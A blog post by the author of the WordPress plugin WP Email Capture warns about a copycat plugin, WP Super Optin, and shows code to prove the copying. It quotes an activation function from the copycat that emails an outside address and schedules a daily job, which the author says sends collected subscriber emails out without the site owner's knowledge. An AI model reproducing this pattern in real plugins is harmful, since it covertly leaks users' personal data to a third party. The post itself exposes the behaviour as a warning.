In the past week, it has come to my attention that a plugin has been released that uses a lot of the source code for WP Email Capture entitled WP Super Optin. After having a look at it, I would strongly advise against installing & running this on your blog, and instead running WP Email Capture. There’s three reasons for this.

WP Super Optin Is Illegal

WP Email Capture is released under the GPL. In the long & short of it, it basically means that you are free to make changes & distribute it, however you must give credit to the original plugin owner. Although the plugin uses my functions & code, it doesn’t give credit. Instead they rename a bunch of functions.

Here’s the first 30 lines of process.php in WP Email Capture:-

<?php

function wp_email_capture_process()

{

 if(isset($_REQUEST['wp_capture_action'])) {
 wp_email_capture_signup();
 }

 if(isset($_GET['wp_email_confirm']) ||
isset($_REQUEST['wp_email_confirm'])) {
 wp_capture_email_confirm();
 }

}

function wp_email_capture_double_check_everything($name, $email)

{

 if (wp_email_injection_chars($name) ||
wp_email_injection_chars($email) ||
wp_email_injection_chars($name) ||
wp_email_injection_chars($email))

 {

 return FALSE;

And here’s the first 30 lines of process.php in WP Super Optin.

<?php

function wp_super_optin_process()

{

 if(isset($_REQUEST['wp_capture_action'])) {wp_super_optin_signup();
 }

 if(isset($_GET['wp_email_confirm']) ||
isset($_REQUEST['wp_email_confirm'])) {
 superoptin_wp_capture_email_confirm();
 }

}

function wp_super_optin_double_check_everything($name, $email)

{

 if (superoptin_wp_email_injection_chars($name) ||
superoptin_wp_email_injection_chars($email) ||
superoptin_wp_email_injection_chars($name) ||
superoptin_wp_email_injection_chars($email))

 {

 return FALSE;

Whilst I don’t go around suing people running the plugin, it is in violation of Title 17 U.S. Code, Section 106(a) of the Copyright Act of 1976, and several recognized international copyright laws. More scary from your perspective, is the second step.

WP Super Optin Is Insecure

From reading the support forums, I found this nasty piece of code:-


function wp_super_optin_activation()
 {

 $domain = $_SERVER['HTTP_HOST'];

 //  mail("masstrend@aol.com","The plugin activation on " . $domain ,"The plugin is activated and this scheduled hook is ready for use.");

 mail("masstrend@aol.com","The plugin activation on " . $domain ,"The plugin is activated and this scheduled hook is ready for use.");

 if ( !wp_next_scheduled( 'email_scheduled_csv' ) ) {
 //$timestmp = (time()+300);
 $timestmp = strtotime("tomorrow 3 AM");
 wp_schedule_event($timestmp, 'daily', 'email_scheduled_csv');

 $date = date('j F Y g:i:s A',$timestmp);
 mail("masstrend@aol.com","Email for optin CSV scheduled","Email for optin CSV has been scheduled for " . $date. " and the current date/time is " . $date = date('j F Y g:i:s A', time()) );
 mail("wordpress@wpemailoptin.com","Email for optin CSV scheduled","Email for optin CSV has been scheduled for " . $date. " and the current date/time is " . $date = date('j F Y g:i:s A', time()) );

 }
 }

What this function does is email back on a daily basis all email addresses you collect. Why he wants to use them I’m not sure, but I can imagine it is to spam the bejesus out of them. Not good.

This violates the CANSPAM act (you need to double opt-in to emails), and is bloody sneaky. WordPress doesn’t like it either. Furthermore, emails are sent when you activate & deactivate the plugins, without your knowledge.

WP Super Optin Is Unsupported

Finally, I’ve been receiving emails asking for support on WP Super Optin. Why I have no idea, but it’s frustrating, and each one I’ve told them what I’ve just told them, and they should download WP Email Capture instead.

To download, click the button below:-

downloadbutton

What I’m Doing

I’m a bit pissed off with it, as he’s deliberately targeting me in search engines, comment spamming & spinning lies on forums such as Warrior Forum.

On Wednesday (with a huge thank you to uber PHP Ninjaguru Jem for sending me the template) I sent the email address within the Whois details (although I’ve never been to Los Angeles, I’m confident to say that there’s no street called WPEmailOptin Street), and I’ve heard nothing back. So onto the stage 2: which is a three pronged attack. An angry blog post (SEO’ed to buggery to rank for the plugin name), emails to WordPress & emails to Hostgator, his host (and also mine).

Fingers crossed!

Update (1pm GMT): Just had an update from WordPress. It’s been removed from the WordPress Plugin Repository. Thank you :)

Update (9th December, 5pm GMT): After a discussion with the Hostgator security team, who were lovely, the site has been removed.

 

« Previous PageNext Page »



  • The secrets to blogging success
About Rhys

Rhys Wynne, the author of this blog, is a 20 something web designer from Colwyn Bay. Go to my favourite posts

Find out More

On Social Networks

Facebook Twitter Youtube Facebook Fan Page Linked In StumbleUpon Digg Delicious Myspace last.fm dopplr Problogger Blog Engage Problogger

Facebook
Twitter
Youtube
Facebook Fan Page
Digg
Delicious
Myspace
last.fm
Dopplr
StumbleUpon
Problogger.com Forums
Playfire
Blog Engage
Linked In

 

Sponsors